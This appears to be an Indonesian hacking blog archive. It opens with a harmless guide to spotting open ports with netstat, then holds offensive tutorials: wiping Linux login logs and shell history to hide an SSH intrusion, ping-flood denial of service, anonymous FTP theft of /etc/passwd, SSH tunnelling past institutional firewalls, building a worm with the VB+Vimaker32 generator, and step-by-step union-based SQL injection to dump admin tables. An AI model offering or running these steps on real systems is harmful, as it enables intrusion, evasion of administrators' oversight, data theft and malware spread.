Selasa, 08 April 2014

Cek Port Aktif di Komputer

Kita tentu sdh paham jika komunikasi TCP/IP menggunakan port number untuk komunikasi di jaringan. Aplikasi baik maupun jahat menggunakan port number ini untuk berkomunikasi. Oleh karena itu kita perlu tahu port yang aktif di PC kita.

Anda ingin tahu port berapa saja yang aktif dikomputer anda ?
Anda ingin tahu host mana yang terhubung ke komputer anda ?
Anda ingin tahu aplikasi baik atau jahatkah yang aktif dibalik port tersebut ?
Anda ingin tahu caranya mematikan port tersebut ?

Sedikit tips berikut mungkin membantu anda :

1. Jalankan DOS prompt, dari start-run ketikkan cmd kemudian enter
2. Ketikkan netstat -an (perintah ini akan menunjukkan seluruh port aktif dan ip address yang terhubung)
3. Untuk memastikan aplikasi apa yang aktif dibalik port tersebut, ketikkan netstat -anb (perintah ini akan menunjukkan file aplikasi yang terlibat dalam aktifasi port, list yang meuncul akan menunjukkan seluruh file yang terlibat, file dalam tanda [ ] adalah file exe terakhir yang menjalankan port tersebut.
4. Perintah lain yang bisa digunakan adalah netstat -ano
5. Selain file yang aktif dengan perintah diatas kita bisa melihat PID atau nomor proses di Windows. Kita bisa mnegecek status PID ini dengan perintah tasklist atau tasklist /SVC untuk menampilkan service nya , akan muncul informasi PID, memory yang dipakai, nama image dan nama service.
6. Untuk memastikan apakah aplikasi tsb legal atau tidak, bisa dicek labih lanjut ke registri informasi service tersebut. Ketikkan regedit dari DOS prompt dan Klik Edit-Find masukkan service yang dicurigai tsb.
7. Kemudian Jika ternyata aplikasi ilegal, untuk mematikan PID proses yang sedang berjalannya, ketikkan taskkill /F /PID /T

Sedikit Tips diatas bisa digunakan untuk melacak adanya file jahat seperti Trojan yang aktif di PC Kita. Berikut contoh kasus :

Hasil tampilan netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 2744
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 1524
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2744
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 616
TCP 0.0.0.0:1680 0.0.0.0:0 LISTENING 616
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 3828
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1480
TCP 0.0.0.0:5432 0.0.0.0:0 LISTENING 2856
TCP 0.0.0.0:5800 0.0.0.0:0 LISTENING 2224
TCP 0.0.0.0:5900 0.0.0.0:0 LISTENING 2224
TCP 0.0.0.0:12345 0.0.0.0:0 LISTENING 2492


Terlihat diatas ada port 12345 terbuka yang biasanya dipakai oleh Trojan, kita perlu mengecek lebih lanjut dengan tasklist utk memastikan aplikasi yg berjalan dibalik port tersebut. Hasilnya

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 48 K
smss.exe 1092 Console 0 60 K
csrss.exe 1156 Console 0 2,768 K
winlogon.exe 1180 Console 0 948 K
services.exe 1224 Console 0 1,500 K
lsass.exe 1236 Console 0 1,764 K
svchost.exe 1480 Console 0 1,748 K
svchost.exe 1524 Console 0 1,252 K
svchost.exe 1680 Console 0 8,656 K
svchost.exe 1756 Console 0 3,352 K
vsmon.exe 1876 Console 0 10,908 K
spoolsv.exe 460 Console 0 1,384 K
AeXNSAgent.exe 576 Console 0 11,852 K
CCSRVC.exe 588 Console 0 92 K
ShellKer.exe 616 Console 0 2,084 K
iviRegMgr.exe 712 Console 0 108 K
jqs.exe 728 Console 0 1,396 K
MDM.EXE 756 Console 0 460 K
svchost.exe 824 Console 0 288 K
NTRtScan.exe 880 Console 0 9,148 K
nvsvc32.exe 1772 Console 0 396 K
svchost.exe 1816 Console 0 296 K
explorer.exe 924 Console 0 5,904 K
pg_ctl.exe 900 Console 0 148 K
svchost.exe 1832 Console 0 260 K
TmPfw.exe 1124 Console 0 2,576 K
TmProxy.exe 2040 Console 0 3,460 K
winvnc4.exe 2224 Console 0 360 K
TmListen.exe 2492 Console 0 9,292 K

Dengan tasklist /SVC kelihatan

TmListen.exe 2492 tmlisten

Berarti TmListen.Exe tersebut dijalankan oleh Service tmlisten di Windows. Dari registry kita lihat apakah tmlisten itu,dari HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tmlisten kelihatan sbb :

Key Name: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tmlisten
Value 3
Name: ImagePath
Type: REG_EXPAND_SZ
Data: "C:\Program Files\Trend Micro\OfficeScan Client\tmlisten.exe"
Value 4
Name: DisplayName
Type: REG_SZ
Data: OfficeScan NT Listener
Value 5
Name: DependOnService
Type: REG_MULTI_SZ
Data: Netman
WinMgmt
Value 8
Name: Description
Type: REG_SZ
Data: Receives commands and notifications from the OfficeScan server and facilitates communication from the client to the server.

Ternyata port 12345 dipakai oleh aplikasi TrendMicro untuk berkomunikasi dengan server Antivirusnya.

Cara menghilangkan jejak stelah HACKING dngn ssh

bagaimana cara agar si admin tidak mengira bahwa servernya pernah dimasuki dan diutak-atik seseorang lewat remote shell ssh. Sehingga siadmin tidak merubah-rubah password untuk kita gunakan pada penyusupan berikutnya.

Menghapus log juga bertujuan untuk tidak meninggalkan ip address yg bisa dilacak kepunyaanya oleh si admin.

Tutorial ini berkaitan dengan cara menghapus semua log yg mencatat aktifitas penyusup dalam sistem operasi linux.

Menghilangkan diri dari perintah last (perintah untuk melihat catatan semua user yg pernah login/logout baik local moupun remote) command yg digunakan adalah:
#echo >/var/log/wtmp
#echo >/var/log/lastlog

Log-log yang lain yg perlu dihapus pake command:
#echo >/var/log/messages
#echo >/var/log/secure
#echo >/var/log/maillog
#echo >/var/log/xferlog

Jangan lupa terakhir menghapus history shell command:
#history -c

setelah itu jangan ketik apa-apa lagi, just logout or cltr+D

moga bermanfaat :D

CMD for AMAZING



Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, inilah keterangannya.

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.



Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.


Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********

Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping
www.yahoo.com

Pinging
www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms



Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert

Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert
http://www.yahoo.com/” pada dos prompt maka akan terdapat:

Tracing route to
www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms *
www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]

Trace complete.

Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka
http://www.yahoo.com/ dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com/ dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.

Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.


3. Telnet

Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.


***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet
http://www.cyberspace.org/” maka seperti gambar dibawah inilah yang saya dapatkan.




Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.

Well,
http://www.cyberspace.org/ memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.



4. FTP

FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:


! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:

1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd /etc/home
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.* sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.* gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open
www.target.com
7. 'bye' closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka
http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.



5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan
http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:


Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.


Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.

Sebagai contoh jika saya membuka
http://www.yahoo.com/ maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:

"TCP 203.43.50.81:2034
www.yahoo.com:80 ESTABLISHED"

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80

Cara Hack Firewall

Kali ini saya akan menjelaskan tentang "Cara Mudah Hack Firewall"
Seperti yang kita tahu bahwa Firewall adalah komponen dasar untuk mengamankan tujuan dasar network.The dari firewall adalah untuk mengisolasi satu jaringan dari yang lain. Firewall menjadi tersedia sebagai peralatan, berarti mereka dipasang di ke jaringan antara dua Hacker networks.The sering memotong Antiviruses dan Anti-spywares oleh beberapa metode Seperti crypting, Hexing, File-memompa dll, tapi itu menjadi sangat sulit bagi seorang Hacker untuk melewati Firewall jadi artikel ini akan menjelaskan tentang metode-metode apa Hacker menggunakan untuk melewati / Hack firewall
Firewall sering disebut Penghalang (Kendala) di Hacking, bagan berikut ini akan menunjukkan kerja firewall.
Metode yang paling Hacker gunakan untuk melewati firewall dikenal sebagai SSH tunneling.
Apa yang SSH Tunneling?
Nah menurut wikipedia A Secure Shell (SSH) terowongan terdiri dari sebuah terowongan dienkripsi diciptakan melalui koneksi protokol SSH. Pengguna dapat mengatur terowongan SSH untuk terowongan lalu lintas tidak terenkripsi melalui jaringan melalui saluran terenkripsi
Untuk informasi lebih lanjut tentang SSH Tunneling Lihat di Wikipedia Disini
Mengapa Anda ingin melewati firewall?
Kebanyakan administrator jaringan di tempat kerja, universitas atau sekolah menolak akses ke file sharing, instant messaging atau jaringan sosial seperti facebook atau myspace dengan firewall atau proxy server. Jika Anda terus-menerus mendapatkan pesan yang mengatakan "Tidak dapat tersambung" atau sesuatu yang mirip, layanan yang Anda mencoba untuk menyambung ke mungkin telah diblokir oleh administrator jaringan Anda.
SSH Tunneling Demonstrasi:
Sekarang saya akan menunjukkan Anda tentang Cara melewati / Hack firewall menggunakan SSH Tunneling
Hal pertama :
  • Yang perlu Anda lakukan adalah membuat account untuk akses SSH, Ada banyak penyedia SSH dibayar dan gratis yang terdaftar dalam direktori DMOZ, misalnya Superprotocol.com
  • Selanjutnya Anda perlu men-download PUTTY.Putty merupakan sumber client SSH terbuka.
  • Setelah Anda download jalankan dan Anda akan dikirim ke halaman konfigurasi.
  • Anda akan masuk dalam nama host server melalui mana kita dapat menghubungkan akses SSH dengan, pastikan SSH dipilih menggunakan port 22.
  • Sekarang Terowongan goto dalam pilihan SSH, Di sini kita akan mendirikan sebuah terowongan
  • Mengubah port Source untuk 8080 dan klik Dinamis.
  • Setelah ini Selesai Klik terbuka.
  • Sekarang login dengan informasi Anda yang Anda berikan dalam Provider SSH
  • Sekarang Anda telah berhasil membangun terowongan.
  • Sekarang Unduh wireshark dan mengeksekusi wireshark.
  • Sekarang start Packet capture, maka akan kosong dan sekarang mengunjungi google.com dari browser Anda, Anda akan melihat paket mendapatkan ditangkap
  • Sekarang kita akan mengkonfigurasi Mozilla firefox untuk menggunakan koneksi SSH.
  • Buka menu "Tools" dan kemudian "Options"
  • Pergi ke tombol "Advanced", "Network" tab, dan kemudian klik "Settings"
  • Sehubungan pengaturan masukkan "localhost" pada kolom "Host Socks dan nomor port Anda, seperti" 1.080 "ke kolom "Port: "
  • Sekarang kita akan kembali ke wireshark Anda akan melihat sekelompok koneksi SSH, seperti yang Anda lihat kita tidak lagi memiliki informasi apa yang sedang dikirim dari server ke klien
  • Newbie akan merasa sangat sulit untuk melakukannya, banyak orang mengeluh bahwa Anda hanya posting konten untuk newbie untuk apa Menengah sehingga artikel ini adalah untuk semua orang-orang,
Perhatikan: Jangan copy artikel ini jika Anda menyalin silakan menyediakan link kembali ke article.Licensed di bawah lisensi Common Creative

Minggu, 24 Juni 2012

http://muchlisoft.wordpress.com/2012/04/02/tutorial-dasar-sql-injection-il/

Sabtu, 23 Juni 2012

VB+Vimaker32

Tulisan ini dibuat untuk para newbie yang ingin tahu, dan mencoba sesuatu hal yang baru dan cukup menyenangkan dan mengasikan…he..he…
Oke, tanpa banyak cang…cing…cong….nyak..babeh…, mari kita mulai dengan ‘Black Project’ yang akan kita ciptakan, siap….????? Oke kita mulai…..

—- more —-
Tapi sebelumnya ada yang tau VB+Vimaker32 ga??? Oke, mungkin biar ga bingung and ga tersesat nantinya , saya akan jelaskan sedikit. VB+ViMaker32 adalah sebuah worm generator yang diciptakan khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah gaulnya GPLLY (ga pake lama la yaw)

Sesuai dengan namanya program ini dapat menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi tertentu sesuai dengan pengaturan yang diberikan. (Bener-bener sesuai dengan pengaturan yang kita kasih lho….), so buat para newbie yang pengen jadi #VM (Virus Maker bo…!) bisa pake ni program buat belajar. Tapi Cuma buat belajar lho, bukan buat mainan atawa yang laen apalagi buat ngerusak komputer orang laen, sesuai dengan tujuan dibuatnya tool ini, Cuma buat pendidikan dan ilmu pengetahuan, (Itu kata pembuatnya….).Oh ya Program ini bisa didownload gratis di: http://www.spyrozone.net di menu Vir&Worm + Removal. Atau e-mail aj ke sang empunya di: rzwan182@gmail.com.
Oke dech langsung aj kali ye… bis cape ngomong terus dari tadi ga mulai-mulai neh…J Tapi sebelum kita memulai membuat ‘Black Project’ dengan tool ini kita membutuhkan beberapa persyaratan dan tools, yang semuanya bisa didownload di dapur kalian masing-masing:

1. Sebuah gelas yang berisi soda gembira.
2. Sebuah lagu dari mxpx,RHCP,Blink 182,dan Green Day
3. Makanan ringan ( yang ada isi nya,jangan cuma bungkusnya )
4. Hati, Pikiran dan niat yang tulus dan ikhlas untuk menanggung segala macam akibat dan resiko yang terjadi apabila kesalahan atau ketidaksengajaan yang menyebabkan worm yang dibuat menjadi raja dikomputer sendiri (sejenis senjata makan tuan gtu…)
Sekarang benar-benar mulai deh, setelah didownload, pertama install dulu program VB+Vimaker32-nya tapi sebelumnya backup dulu data2 penting untuk mencegah sesuatu yang tidak diinginkan, truz jalanin file .exe nya, lalu pilih File->Project Baru (Full Load) atau tekan Ctrl+M di keyboard. 

Masukan semua keterangan tentang virus yang akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan, untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan leluasa gt.

Untuk pengaturan tentang registry yang akan diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50 Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa dipilih. Tuh kan ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program! He..he…

Jangan lupa icon virusnya juga bisa diubah, untuk mengganti icon default tinggal ubah di subsection : EXEIcon = \Icons Source\Folder\Folder001.ico
Terdapat banyak pilihan icon yang disediakan didalam folder Icons Source, so tinggal pilih aja…
Terakhir dan merupakan saat yang ditunggu-tunggu adalah melakukan pemeriksaan kode yang telah diketik sebelum dicompile menjadi virus. Klik menu Project->Analisa Project atau tekan F8 untuk menganalisa kode, setelah analisa selesai dan tidak ada kesalahan penulisan kode yang dideteksi maka ‘Black Project’ yang kita buat bisa langsung dicompile. Tekan F9 untuk mengcompile project dan sebuah pesan peringatan akan muncul dan menanyakan apakah proses compile akan dilajutkan, baca dulu semua konsekuensinya truz klo setuju klik yes, maka virus yang kita buat akan langsung dicompile menjadi file executable (.exe)




File virus hasil compile :


File hasil compile memang cukup besar karena tidak otomatis dikompres secara internal, tapi kita masih bisa mengompres dengan program kompresor lain seperti UPX atau tElock. Akhir kata selamat ber-Virus Maker xxx Semoga artikel ini bermanfaat
sekian dulu dari saya dan terimakasih n_n

Selasa, 19 Juni 2012

Tutorial SQL Injection Step By Step

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+where+table_schema=database()--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



